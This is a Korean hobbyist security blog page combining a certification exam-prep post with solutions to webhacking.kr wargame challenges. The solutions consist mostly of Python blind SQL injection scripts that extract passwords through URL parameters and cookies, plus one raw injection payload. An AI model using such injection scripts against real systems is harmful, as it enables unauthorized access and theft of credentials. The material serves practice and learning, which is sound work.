Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/12 »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31

 
 

2회 정보보안기사 실기 예상 문제

Seminar | 2013. 12. 6. 23:11 | Posted by binaryU

지난번 1회때... 56점인가로... 떨어져서... 씨발 씨발 하고 몇 달이 지났다...

1회때 실수는...


- 정답) find /etc/apache/conf -mtime -10

- 내가 작성한 답) find /etc/apache/conf -mtime < 10


이런... 10일 이내라는것이 갑자기 생각이 안나서 < 로 적어서 떨어졌다...


다른 문제들도 채점 상태를 보면... 부분 점수를 전혀 주지 않은 듯 했다...

빈칸을 쓰던... 나 처럼 부분 오류를 내던... 모두 0점 처리가 된 듯 하다...


그건 좀 너무한거 아닌가? 저 한 문제가 14점이었던거 같은데... 4점만 줬어도 붙었을 텐데...


아무튼 2회때 예상 문제를 한번 점 춰 본다...


아마, 누군가 이 글을 시험 보기 전에 읽고... 그리고 이게 적중을 하고... 그리고 합격을 했다면...

나한테 밥 한번 사겠다고 연락이 오겠지...


* 네트워크 부분

1. access-list 구성하기

  - access-list 1 permit 10.1.1.0 0.0.0.255

  - ip access-group 1 in


* 서버부분

2. find로 setuid, setgid, sticky bit 설정 파일 찾기

  - find / -type f -perm -4000

  - find / -type f -perm -2000

  - find / -type f \(-perm -1000 -o -perm -2000\)


*취약점 부분

3. Apache directory listing 제거 설정하기

  - /etc/httpd/conf/httpd.conf를 연다. (경로는 시스템마다 다름)

  - Options Indexes FollowSymLinks 부분에서 Indexes를 삭제한다.


내가 점치는 2회 실기 서술형 또는 실무형 예상 문제...


아... 이런... 오늘... 늦잠 자서... 셤 보러 못 갔다... 젠장...



'Seminar' 카테고리의 다른 글

리버싱 관련 문서  (0) 2014.03.18
제1회 정보보안기사 실기 후기  (1) 2013.08.26
제1회 정보보안기사 필기 후기  (2) 2013.07.07
HWP 악성코드 삽입  (0) 2013.03.04
:

webhacking.kr 55번 문제 풀이

Wargame | 2013. 3. 4. 02:10 | Posted by binaryU

import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/challenge/bonus/bonus-1/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password="4348414c4c454e47453535434c6561727e7e4b4b"

for j in range(21, 50):
   for i in range(32,127):
      ii=hex(i)
      iii=ii[2:4]
      print ii
      if i < 99999 or i > 96:
          url1="http://webhacking.kr/challenge/web/web-31/rank.php?score=0 and ip=0x6c6f63616c686f7374 and left(pAsSw0RdzzzZ,%d)=0x" %j
          url2="%s" %password
          url3=url1+url2+"%s" %iii
          print url3
          req=urllib2.Request(url3)
          req.add_header('Cookie',"notice=yes; PHPSESSID=0be9e96926e7403cbc78d8b72499be3d")
          read=urllib2.urlopen(req).read()
          ok = re.findall("localhost",read)
          if ok:
              password=password+"%s" %iii
              print password
              break


'Wargame' 카테고리의 다른 글

suninatas.com 8번 문제 풀이  (1) 2014.09.23
추천 워게임 사이트 써니나타스  (0) 2013.04.18
webhacking.kr 56번 문제 풀이  (4) 2013.03.04
webhacking.kr 40번 문제 풀이  (6) 2013.03.04
webhaking.kr 2번 문제 풀이  (2) 2012.12.15
:

webhacking.kr 9번 문제 풀이

Webhacking | 2013. 3. 4. 01:18 | Posted by binaryU

Apache HTTP Basic Authorization Bypass


bypass_apache_web_authorization.pdf


9번 문제는 일단 인증을 우회하고 들어간다음...


본격적으로 문제를 풀어야 하는데...


인증에서 부터 막히는 사람들이 꽤 많은것 같다...


그런 사람들은 위 pdf 문서를 먼저 참고하면 좋겠다.

'Webhacking' 카테고리의 다른 글

[PHP2EXE] PHP Compiler/Embedder 1.21  (0) 2013.03.04
.htaccess Attack Sample for PHP  (0) 2013.03.04
Mysql Table Name Search  (0) 2013.03.04
mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기  (0) 2013.03.04
아스키 코드표  (0) 2013.02.12
:

webhacking.kr 56번 문제 풀이

Wargame | 2013. 3. 4. 01:12 | Posted by binaryU

import urllib,urllib2,ClientCookie

params = urllib.urlencode({'id':"ID",
                           'pw':"PW"})

request = urllib2.Request("http://webhacking.kr/index.html", params)
response = ClientCookie.urlopen(request)
data = response.read()

pos = data.find("<!-- http://webhacking.kr/blog.php -->")

ch = ['/', '.', '0', '2', 'a', 'c', 'e', 'f', 'g', 'h', 'l', 'p', 'r', 't', 'w']

#0 2 a c e f g h l p r t w

answer = "w"

#<a href=?read=admin>readme

if pos > 0:
    print "Login Failed"
else:
    print "Login Success"
    for k in range(0, 32):
        for i in range(0, 14):
            paramsProblem = urllib.urlencode({'search':answer+ch[i]})
            print answer+ch[i]
            requestProblem = urllib2.Request("http://webhacking.kr/challenge/web/web-33/index.php", paramsProblem)
            responseProblem = ClientCookie.urlopen(requestProblem)
            dataProblem = responseProblem.read()
            posProblem = dataProblem.find("read=admin")
            if posProblem > 0:
                print ch[i]
                answer += ch[i]
                break
            else:
                print "trying : ", ch[i]
print answer

 

첨부파일을 C:\Python27\Lib\site-packages에 풀어 넣는다.

clientcookie.zip


'Wargame' 카테고리의 다른 글

suninatas.com 8번 문제 풀이  (1) 2014.09.23
추천 워게임 사이트 써니나타스  (0) 2013.04.18
webhacking.kr 55번 문제 풀이  (0) 2013.03.04
webhacking.kr 40번 문제 풀이  (6) 2013.03.04
webhaking.kr 2번 문제 풀이  (2) 2012.12.15
:

webhacking.kr 40번 문제 풀이

Wargame | 2013. 3. 4. 00:53 | Posted by binaryU

no=-1||id%09like%090x6125%26%26pw%09like%090x6625&id=a&pw=a

'Wargame' 카테고리의 다른 글

suninatas.com 8번 문제 풀이  (1) 2014.09.23
추천 워게임 사이트 써니나타스  (0) 2013.04.18
webhacking.kr 55번 문제 풀이  (0) 2013.03.04
webhacking.kr 56번 문제 풀이  (4) 2013.03.04
webhaking.kr 2번 문제 풀이  (2) 2012.12.15
:

webhaking.kr 2번 문제 풀이

Wargame | 2012. 12. 15. 12:34 | Posted by binaryU


webhacking.kr 2번.pdf


위 pdf 내용을 읽어 보셔도 잘 이해가 안 가시는 분들이 많이 계신거 같네요...

SQL Injection vector를 못 찾겠다는 댓글이 많은데...

우선, 쿠키값을 편집 할 수 있어야 합니다.

참고로, 저는 크롬에서 "Edit This Cookie"라는 확장프로그램을 사용하고 있는데요...

그림은 아래와 같습니다.

위 그림에서 보듯이 쿠키 값중에 time이라는 변수에 1361812648이라는 값이 들어있죠? 이것이 현재시간을 나타내는 값입니다. 이 부분 뒤에 Query를 삽입 하면 됩니다.

죄송하지만, pdf 풀이집을 보셔도... 쿠키 편집 화면을 보셔도... 그래도 이해가 안가신다면...


python으로 blind injection을 거는 소스를 추가 합니다...

import re,urllib,urllib2

#fw = urllib.urlopen("http://webhacking.kr/challenge/web/web-02/")

#read = fw.read()

password=""

for j in range(1,100):

   print "%d" %j

   for i in range(33,126):

       url="http://webhacking.kr/challenge/web/web-02/"

       req=urllib2.Request(url)

       req.add_header('Cookie',"time=1337906400 and (select ascii(substring(password,%d,1)) from FreeB0aRd)=%d; PHPSESSID=5042bff0afa5d30839aac4db01016d6e; notice=yes" %(j,i))

       read=urllib2.urlopen(req).read()

       ok = re.findall("<!--2070-01-01 09:00:01--></td>",read)

       if ok:

           password=password+chr(i)

           print password

           break



'Wargame' 카테고리의 다른 글

suninatas.com 8번 문제 풀이  (1) 2014.09.23
추천 워게임 사이트 써니나타스  (0) 2013.04.18
webhacking.kr 55번 문제 풀이  (0) 2013.03.04
webhacking.kr 56번 문제 풀이  (4) 2013.03.04
webhacking.kr 40번 문제 풀이  (6) 2013.03.04
: